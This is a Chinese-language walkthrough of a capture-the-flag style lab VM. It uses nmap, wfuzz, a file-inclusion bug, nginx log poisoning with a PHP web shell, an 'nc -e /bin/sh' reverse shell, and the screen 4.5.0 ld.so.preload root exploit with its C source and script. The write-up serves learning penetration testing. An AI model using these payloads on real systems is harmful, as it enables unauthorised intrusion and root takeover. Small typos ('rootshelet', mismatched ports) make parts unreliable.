1.nmap -sP 192.168.0.100/24   老规矩上来先找一下靶机的ip，最终锁定192.168.0.149
2.nmap -A -p 1-65535 192.168.0.149   老规矩找到ip，进行端口扫描80/111/37380
3.80端口访问一下，没发现什么，dirb一下看看，好像没啥利用的，最终在提交之后的表单发现了文件包含问题，每刷新一次，年份就会改变一次，get传参？？？
4.用wfuzz测试一下wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.0.100/thankyou.php?FUZZ=/etc/passwd
200 70 L 104 W 2319 Ch "file"
http://192.168.0.100/thankyou.php?file=/etc/passwd测试一下成功回显
5.whatweb -v 192.168.0.100  发现了漏洞进行信息收集反弹shell，发现时nginx1.6.2
/etc/nginx/nginx.conf查看nginx的日志文件位置,发现在 /var/log/nginx/access.log和error_log /var/log/nginx/error.log 。访问一下试试，成功。利用日志反弹shell
6.GET /thankyou.php?file=<?php system($_GET['shell']);?> HTTP/1.1   利用提交表单往日志里传一句话木马，
7.GET /thankyou.php?file=/var/log/nginx/error.log&shell=ls HTTP/1.1测试一下可以执行
GET /thankyou.php?file=/var/log/nginx/error.log&shell=nc -e /bin/sh 192.168.0.103 999 HTTP/1.1这边发送监听，kali监听本地nc -lvp 9999监听9999端口，
8.成功反弹shell，id看一下权限，一般用户……
python -c 'import pty;pty.spawn("/bin/bash")' 建立一个交互窗口
9.sudo -l 失败
find / -perm -4000 -user root 2>/dev/null查看一下有什么可以提权的文件
searchsploit screen 4.5.0在kali里searchsploit看一下这个文件可以利用的漏洞screen是一个命令行切换软件
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh将脚本复制到桌面上。
vim libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
然后进行编译：
gcc -fPIC -shared -ldl -o libhax.so libhax.c
生成libhax.so文件，并将之前的.c文件删除；
再将第二段代码拷贝进rootshell.c：
gcc -o rootshell rootshell.c    并删除.c文件：rm -f rootshell.c
最后将原来的.sh文件修改如下，并在保存的时候设置:set ff=unix (set ff=unix : 告诉 vi 编辑器，使用unix换行符)
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshelet
:set ff=unix
:wq!
脚本完成
10.python -m SimpleHTTPServer 80利用python临时起一个http网站，wget失败了，我们要将这三个文件发送到靶机上，kali上 nc -lvp 5555 < rootshell 在靶机上
nc 192.168.0.103 5555 > rootshell，传完kali，ctal+c断开连接下一个
11.cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
id
发现是root了
cd /root
ls
cat thisistheflag.txt

888b 888 d8b 888 888 888 888
8888b 888 Y8P 888 888 888 888
88888b 888 888 888 888 888
888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888
888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888
888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " "
888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888

Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

end

收获

1.nc成功发送文件

2.python -c 'import pty;pty.spawn("/bin/bash")' 建立一个交互窗口

3.python -m SimpleHTTPServer 80利用python临时起一个http网站

4.利用searchsploit工具进行漏洞利用

5.wfuzz使用参考文章1